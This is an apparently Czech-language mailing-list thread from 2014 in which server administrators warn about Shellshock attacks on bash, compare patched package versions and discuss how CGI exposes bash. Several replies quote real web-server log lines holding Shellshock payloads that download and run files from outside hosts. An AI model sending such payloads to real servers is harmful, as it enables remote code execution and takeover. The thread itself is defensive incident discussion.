29 Sep
2014
29 Sep
'14
7:41 a.m.
Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném proudu,
podle logu se mi včera někdo snažil do serveru nahrát rootkit a pustit
ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
--
Petr Krčmář
vpsFree.cz
29 Sep
29 Sep
7:54 a.m.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Ahoj Petre,
diky.
Nasel jsou zatim pouze toto :)
/var/log/nginx/access.log:54.251.83.67 - - [29/Sep/2014:07:26:24
+0200] "GET / HTTP/1.1" 200 612 "-" "() { :;}; /bin/bash -c
\x22echo
testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log-20140925.gz:209.126.230.72 - -
[24/Sep/2014:23:47:52 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping
- -c 11 216.75.60.74" "shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)&qu…
/var/log/nginx/access.log-20140926.gz:209.126.230.72 - -
[25/Sep/2014:03:52:42 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping
- -c 11 209.126.230.74" "shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)&qu…
/var/log/nginx/access.log-20140926.gz:89.207.135.125 - -
[25/Sep/2014:14:38:39 +0200] "GET /cgi-sys/defaultwebpage.cgi
HTTP/1.0" 404 162 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
/var/log/nginx/access.log-20140926.gz:198.20.69.74 - -
[26/Sep/2014:01:47:24 +0200] "GET / HTTP/1.1" 200 612 "() { :; };
/bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):
Ahoj, jen bych chtěl varovat, že útoky na bash jsou v
plném
proudu, podle logu se mi včera někdo snažil do serveru nahrát
rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpEEkACgkQ5JdzTS3AJTbe4QEAhKZrmMvrkOH4gQZDk5TNbJ5+
zGVw+Zxp5lhx1Y8mBtkBAJBBjVlGvdLEQhFF5RDF3O4aAAgjeN1IOqfNXrBNzB45
=BEHd
-----END PGP SIGNATURE-----
7:57 a.m.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Hele,
z jineho stroje:
/var/log/nginx/access.log-20140929.gz:70.42.149.67 - -
[28/Sep/2014:08:16:18 +0200] "GET / HTTP/1.0" 444 0 "-" "() {
:;};
/bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):
Ahoj, jen bych chtěl varovat, že útoky na bash jsou v
plném
proudu, podle logu se mi včera někdo snažil do serveru nahrát
rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpENIACgkQ5JdzTS3AJTa8fAEAh8VbArIz7ElgezKEI44Yz5E9
fSIKhd/2Z6T0ZSm3o+EA/0vaA7spDhwHRjGcOUtx81p+ScBcWvnM++8q3Iad3wPH
=W15o
-----END PGP SIGNATURE-----
8:02 a.m.
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
--
Petr Krčmář
vpsFree.cz
8:08 a.m.
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl
úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote:
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
8:10 a.m.
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář <janbivoj.kolar(a)zazen-nudu.cz> wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote:
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
8:18 a.m.
Na to mě napadá druhá hloupá otázka: Scientific Linux 6 stále nemá fixnutou verzi v
repozitářích, že ne? A co s tím?
Honza
29. 9. 2014 v 10:10, Michal Miklos <mimik(a)mimik.sk>sk>:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář
<janbivoj.kolar(a)zazen-nudu.cz> wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list On 29.9.2014 10:02, Petr Krcmar wrote:
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
8:24 a.m.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Ahoj,
ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpF1cACgkQ5JdzTS3AJTZH0wEAmEzH0t1Jx5h87KZcT0yBaHHE
aQtIdd8g0R0gkox18PwA+wdnJa6PU5UZAejwO+73++VCzwBUwHMe9OMAlIOlkTMZ
=OESw
-----END PGP SIGNATURE-----
Na to mě napadá druhá hloupá otázka: Scientific Linux
6 stále nemá
fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
29. 9. 2014 v 10:10, Michal Miklos <mimik(a)mimik.sk>sk>:
> jedine si zistit ci mas dobru verziu bashu.
>
>
>> On 29 Sep 2014, at 10:08, Jan B. Kolář
>> <janbivoj.kolar(a)zazen-nudu.cz> wrote:
>>
>> Ahoj,
>>
>> možná hloupá otázka - dá se nějak z logu zjistit, zda ten
>> průnik byl úspěšný či nikoliv?
>>
>> Honza
>>
>>> On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57
>>> Jiří Medvěd napsal(a):
>>>> Hele,
>>>>
>>>> z jineho stroje:
>>> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
>>> rootkit:
>>>
>>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
>>
>>
>>>
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
8:33 a.m.
Hm, nainstalovaná verze je 4.1.2-9 a yum mi ukazuje, že není žádná aktualizace. Smells
fishy.
29. 9. 2014 v 10:24, Jiří Medvěd <admin(a)jirimedved.cz>cz>:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Ahoj,
ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
-----BEGIN PGP
SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpF1cACgkQ5JdzTS3AJTZH0wEAmEzH0t1Jx5h87KZcT0yBaHHE
aQtIdd8g0R0gkox18PwA+wdnJa6PU5UZAejwO+73++VCzwBUwHMe9OMAlIOlkTMZ
=OESw
-----END PGP SIGNATURE----- _______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
Na to mě napadá druhá hloupá otázka: Scientific
Linux 6 stále nemá
fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
29. 9. 2014 v 10:10, Michal Miklos <mimik(a)mimik.sk>sk>:
> jedine si zistit ci mas dobru verziu bashu.
>
>
>> On 29 Sep 2014, at 10:08, Jan B. Kolář
>> <janbivoj.kolar(a)zazen-nudu.cz> wrote:
>>
>> Ahoj,
>>
>> možná hloupá otázka - dá se nějak z logu zjistit, zda ten
>> průnik byl úspěšný či nikoliv?
>>
>> Honza
>>
>>> On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57
>>> Jiří Medvěd napsal(a):
>>>> Hele,
>>>>
>>>> z jineho stroje:
>>> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
>>> rootkit:
>>>
>>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
>>
>>
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
8:35 a.m.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Mam/mame SL 6.5 ...
Dne 29.9.2014 v 10:33 Jan Sedlák napsal(a):
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpGegACgkQ5JdzTS3AJTYGSgEAgOOP/ZsN8LOOEvHkFgSVoBHt
IgJBnECbS0EvjznyoyMA/0q9HKfMVoUC0G/IEEr3nQUPs9gksd/Myd+27F+0QgXX
=XszX
-----END PGP SIGNATURE-----
Hm, nainstalovaná verze je 4.1.2-9 a yum mi ukazuje,
že není žádná
aktualizace. Smells fishy.
29. 9. 2014 v 10:24, Jiří Medvěd <admin(a)jirimedved.cz>cz>:
Ahoj, ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
_______________________________________________
>> Na to mě napadá druhá hloupá otázka:
Scientific Linux 6 stále
>> nemá fixnutou verzi v repozitářích, že ne? A co s tím?
>>
>> Honza
>>
>> 29. 9. 2014 v 10:10, Michal Miklos <mimik(a)mimik.sk>sk>:
>>
>>> jedine si zistit ci mas dobru verziu bashu.
>>>
>>>
>>>> On 29 Sep 2014, at 10:08, Jan B. Kolář
>>>> <janbivoj.kolar(a)zazen-nudu.cz> wrote:
>>>>
>>>> Ahoj,
>>>>
>>>> možná hloupá otázka - dá se nějak z logu zjistit, zda
>>>> ten průnik byl úspěšný či nikoliv?
>>>>
>>>> Honza
>>>>
>>>>> On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v
>>>>> 09:57 Jiří Medvěd napsal(a):
>>>>>> Hele,
>>>>>>
>>>>>> z jineho stroje:
>>>>> Ano, to jsem našel taky. Zjevně se tam někdo snaží
>>>>> tlačit rootkit:
>>>>>
>>>>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
>>>>
>>>>
>>>>>> >>> Community-list mailing list
>>> Community-list(a)lists.vpsfree.cz
>>> http://lists.vpsfree.cz/listinfo/community-list
>>
>> _______________________________________________
>> Community-list mailing list Community-list(a)lists.vpsfree.cz
>> http://lists.vpsfree.cz/listinfo/community-list
> _______________________________________________
> Community-list mailing list Community-list(a)lists.vpsfree.cz
> http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list 
8:42 a.m.
New subject: [vpsFree.cz: community-list] Útoky na bash běží
No ja tiez, ale latest z repa je isto fixnuta verzia ....
$ lsb_release -d
Description: Scientific Linux release 6.5 (Carbon)
$ rpm -q bash
bash-4.1.2-15.el6_5.2.x86_64
/M
2014-09-29 10:35 GMT+02:00 Jiří Medvěd <admin(a)jirimedved.cz>cz>:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Mam/mame SL 6.5 ...
Dne 29.9.2014 v 10:33 Jan Sedlák napsal(a):
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpGegACgkQ5JdzTS3AJTYGSgEAgOOP/ZsN8LOOEvHkFgSVoBHt
IgJBnECbS0EvjznyoyMA/0q9HKfMVoUC0G/IEEr3nQUPs9gksd/Myd+27F+0QgXX
=XszX
-----END PGP SIGNATURE----- _______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
--
Miroslav Vadkerti :: http://vadkerti.net
GnuPG ID 0x32CC29B0 at pgp.mit.edu
SR cell +421904135440 :: CR cell +420776864252
Skype/da.thrix :: ICQ/266161822 :: Jabber/7hR1x(a)jabber.cz
Hm, nainstalovaná verze je 4.1.2-9 a yum mi
ukazuje, že není žádná
aktualizace. Smells fishy.
29. 9. 2014 v 10:24, Jiří Medvěd <admin(a)jirimedved.cz>cz>:
Ahoj, ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
_______________________________________________
>> Na to mě napadá druhá hloupá otázka:
Scientific Linux 6 stále
>> nemá fixnutou verzi v repozitářích, že ne? A co s tím?
>>
>> Honza
>>
>> 29. 9. 2014 v 10:10, Michal Miklos <mimik(a)mimik.sk>sk>:
>>
>>> jedine si zistit ci mas dobru verziu bashu.
>>>
>>>
>>>> On 29 Sep 2014, at 10:08, Jan B. Kolář
>>>> <janbivoj.kolar(a)zazen-nudu.cz> wrote:
>>>>
>>>> Ahoj,
>>>>
>>>> možná hloupá otázka - dá se nějak z logu zjistit, zda
>>>> ten průnik byl úspěšný či nikoliv?
>>>>
>>>> Honza
>>>>
>>>>> On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v
>>>>> 09:57 Jiří Medvěd napsal(a):
>>>>>> Hele,
>>>>>>
>>>>>> z jineho stroje:
>>>>> Ano, to jsem našel taky. Zjevně se tam někdo snaží
>>>>> tlačit rootkit:
>>>>>
>>>>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
>>>>
>>>>
>>>>>> >>> Community-list mailing list
>>> Community-list(a)lists.vpsfree.cz
>>> http://lists.vpsfree.cz/listinfo/community-list
>>
>> _______________________________________________
>> Community-list mailing list Community-list(a)lists.vpsfree.cz
>> http://lists.vpsfree.cz/listinfo/community-list
> _______________________________________________
> Community-list mailing list Community-list(a)lists.vpsfree.cz
> http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
8:36 a.m.
New subject: [vpsFree.cz: community-list] Útoky na bash běží
Zdar,
2014-09-29 10:33 GMT+02:00 Jan Sedlák <boloomka(a)gmail.com>om>:
Hm, nainstalovaná verze je 4.1.2-9 a yum mi ukazuje,
že není žádná aktualizace. Smells fishy.
mas SL6.5? daj "yum repolist", znie to ze frcis na niecom starsom.
/M
29. 9. 2014 v 10:24, Jiří Medvěd <admin(a)jirimedved.cz>cz>:
--
Miroslav Vadkerti :: http://vadkerti.net
GnuPG ID 0x32CC29B0 at pgp.mit.edu
SR cell +421904135440 :: CR cell +420776864252
Skype/da.thrix :: ICQ/266161822 :: Jabber/7hR1x(a)jabber.cz
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Ahoj,
ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list Na to mě napadá druhá hloupá otázka: Scientific
Linux 6 stále nemá
fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
29. 9. 2014 v 10:10, Michal Miklos <mimik(a)mimik.sk>sk>:
> jedine si zistit ci mas dobru verziu bashu.
>
>
>> On 29 Sep 2014, at 10:08, Jan B. Kolář
>> <janbivoj.kolar(a)zazen-nudu.cz> wrote:
>>
>> Ahoj,
>>
>> možná hloupá otázka - dá se nějak z logu zjistit, zda ten
>> průnik byl úspěšný či nikoliv?
>>
>> Honza
>>
>>> On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57
>>> Jiří Medvěd napsal(a):
>>>> Hele,
>>>>
>>>> z jineho stroje:
>>> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
>>> rootkit:
>>>
>>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
>>
>>
_______________________________________________
>
Community-list mailing list Community-list(a)lists.vpsfree.cz
> http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
-----BEGIN PGP
SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpF1cACgkQ5JdzTS3AJTZH0wEAmEzH0t1Jx5h87KZcT0yBaHHE
aQtIdd8g0R0gkox18PwA+wdnJa6PU5UZAejwO+73++VCzwBUwHMe9OMAlIOlkTMZ
=OESw
-----END PGP SIGNATURE-----
8:41 a.m.
Máš pravdu, 6.3.
Honza
----- Původní zpráva -----
Od:"Miroslav Vadkerti" <miroslav.vadkerti(a)gmail.com>
Odesláno:29. 9. 2014 10:36
Komu:"vpsFree.cz Community list" <community-list(a)lists.vpsfree.cz>
Předmět:Re: [vpsFree.cz: community-list] Útoky na bash běží
Zdar,
2014-09-29 10:33 GMT+02:00 Jan Sedlák <boloomka(a)gmail.com>om>:
Hm, nainstalovaná verze je 4.1.2-9 a yum mi ukazuje,
že není žádná aktualizace. Smells fishy.
mas SL6.5? daj "yum repolist", znie to ze frcis na niecom starsom.
/M
29. 9. 2014 v 10:24, Jiří Medvěd <admin(a)jirimedved.cz>cz>:
--
Miroslav Vadkerti :: http://vadkerti.net
GnuPG ID 0x32CC29B0 at pgp.mit.edu
SR cell +421904135440 :: CR cell +420776864252
Skype/da.thrix :: ICQ/266161822 :: Jabber/7hR1x(a)jabber.cz
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Ahoj,
ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list Na to mě napadá druhá hloupá otázka: Scientific
Linux 6 stále nemá
fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
29. 9. 2014 v 10:10, Michal Miklos <mimik(a)mimik.sk>sk>:
> jedine si zistit ci mas dobru verziu bashu.
>
>
>> On 29 Sep 2014, at 10:08, Jan B. Kolář
>> <janbivoj.kolar(a)zazen-nudu.cz> wrote:
>>
>> Ahoj,
>>
>> možná hloupá otázka - dá se nějak z logu zjistit, zda ten
>> průnik byl úspěšný či nikoliv?
>>
>> Honza
>>
>>> On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57
>>> Jiří Medvěd napsal(a):
>>>> Hele,
>>>>
>>>> z jineho stroje:
>>> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
>>> rootkit:
>>>
>>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
>>
>>
_______________________________________________
>
Community-list mailing list Community-list(a)lists.vpsfree.cz
> http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
-----BEGIN PGP
SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpF1cACgkQ5JdzTS3AJTZH0wEAmEzH0t1Jx5h87KZcT0yBaHHE
aQtIdd8g0R0gkox18PwA+wdnJa6PU5UZAejwO+73++VCzwBUwHMe9OMAlIOlkTMZ
=OESw
-----END PGP SIGNATURE----- 
8:54 a.m.
a pokud mám podle logu apt, že byl bash verze
4.2+dfsg-0.1+deb7u1 instalován 2014-09-24 16:38:33, ale v logu Apache mám záznam s HTTP
kódem 200 ze dne 2014-09-27 00:33:55, tak to mám chápat jak?
/var/www/0ops/log/access.log:70.42.149.68 - - [27/Sep/2014:00:33:55 +0200] "GET /
HTTP/1.0" 200 643 "-" "() { :;}; /bin/bash -c \"wget -O
/var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
...tady hlavně nepředpokládám, že webserver handloval request na "/"
spuštěním shellu. A výraz v posledním fieldu je podle mě User-Agent, takže
bych z toho nanejvýš (pokud vůbec) soudil, že request přišel z hacknutého
stroje.
Taky mám v logu něco podobného, na neupgradnutém stroji, a dokud šlo jen o
requesty na "/" a ne na existující, natož spustitelné test.sh apod. (takové
nemám, nejsem blázen), chci doufat, že můžu být klidný. Jinak by podle mě
šlo především o díru ve webserveru, pokud by cokoliv založené na stringu,
který poslal klient jako User-Agent, podstrkával shellu. A o té bychom jistě
už také věděli, v této vzrušené době...
E.
9:04 a.m.
Dne 29.9.2014 v 10:54 Egon Eckert napsal(a):
Jinak by podle mě
šlo především o díru ve webserveru, pokud by cokoliv založené na stringu,
který poslal klient jako User-Agent, podstrkával shellu. A o té bychom jistě
už také věděli, v této vzrušené době...
Ne, tohle je běžné chování CGI. Server musí nějak předat informace
skriptu a nemá moc možností, musí použít proměnné prostředí, aby předal
cestu, user-agenta a podobně. No a tady dojde k chybě, protože pokud je
použit bash, tak ten proměnné automaticky prožene evalem a pokud je v
ních funkce, tak se nadefinuje a průšvih je na světě. Web server je v
tom nevinně.
--
Petr Krčmář
vpsFree.cz
9:39 a.m.
Jinak by podle
mě
šlo především o díru ve webserveru, pokud by cokoliv založené na stringu,
který poslal klient jako User-Agent, podstrkával shellu. A o té bychom jistě
už také věděli, v této vzrušené době...
Ne, tohle je běžné chování CGI. Server musí nějak předat informace
skriptu a nemá moc možností, musí použít proměnné prostředí, aby předal
cestu, user-agenta a podobně. No a tady dojde k chybě, protože pokud je
použit bash, tak ten proměnné automaticky prožene evalem a pokud je v
ních funkce, tak se nadefinuje a průšvih je na světě. Web server je v
tom nevinně. 
9:42 a.m.
A pokud šel request na "/", nebude (s běžnou
konfigurací) co spustit a tak
nic spuštěno nebude. To byla moje "hlavní" hypotéza, proč by nás taková
řádka v logu měla nechat v klidu. Hlavně tohle bych rád, kdyby někdo veřejně
podpořil :).
Běžná konfigurace je - u webů psaných v PHP - že "/" spouští index.php.
Těch bude IMO většina
10:30 a.m.
On Mon, 29 Sep 2014 11:42:07 +0200
Jirka Bourek <trekker.dk(a)abclinuxu.cz> wrote:
Jo, ale jaká je pravděpodobnost, že právě tato exponovaná úvodní
stránka spouští externí proces? Vždyť by ten server musel lehnout
při sebemenší zátěži...
Petr T
A pokud šel
request na "/", nebude (s běžnou konfigurací) co spustit a tak
nic spuštěno nebude. To byla moje "hlavní" hypotéza, proč by nás taková
řádka v logu měla nechat v klidu. Hlavně tohle bych rád, kdyby někdo veřejně
podpořil :).
Běžná konfigurace je - u webů psaných v PHP - že "/" spouští index.php.
Těch bude IMO většina 
8:23 a.m.
New subject: {Disarmed} Re: Útoky na bash běží
Ja mam v logoch nasledovne
root@yuna /home/rene # grep '() {' /var/log/nginx/*
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200]
"GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget
-O
/var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200]
"GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O
/var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200]
"GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash
-c
\x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log.1:209.126.230.72 - - [25/Sep/2014:07:26:09 +0200]
"GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 209.126.230.74"
"shellshock-scan (
http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)&qu…
/var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32 +0200]
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;};
/bin/ping
-c 1 198.101.206.138"
/var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34 +0200]
"GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo
testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log.1:137.189.52.234 - - [27/Sep/2014:23:18:23 +0200]
"GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash
-c
\x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh
http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut len
podozrive procesy? a pohladat nejake stopy po tom, ci sa nezapinaju po
restarte?
2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik(a)mimik.sk>sk>:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář <janbivoj.kolar(a)zazen-nudu.cz>
wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl
úspěšný či
nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote:
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
8:33 a.m.
New subject: {Disarmed} {Disarmed} Re: Útoky na bash běží
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Tak jsem to zkoumal a toto je celkem bezpecne, je to zda se pouze
test, zda-li je ten bash zranitelnej, ale ve skutecnosti to nic nedela.
74.201.85.69/ec.z -> je pouze uvitaci stranka nginxu.
Upgraduj hlavne ten bash :)
Medved
Dne 29.9.2014 v 10:23 René Klačan napsal(a):
Ja mam v logoch nasledovne
root@yuna /home/rene # grep '() {' /var/log/nginx/*
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
+0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
\x22wget -O /var/tmp/ec.z *MailScanner has detected a possible
fraud attempt from "74.201.85.69" claiming to be* *MailScanner
warning: numerical links are often malicious:*
74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
+0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
\x22wget -O /var/tmp/ec.z *MailScanner has detected a possible
fraud attempt from "74.201.85.69" claiming to be* *MailScanner
warning: numerical links are often malicious:*
74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
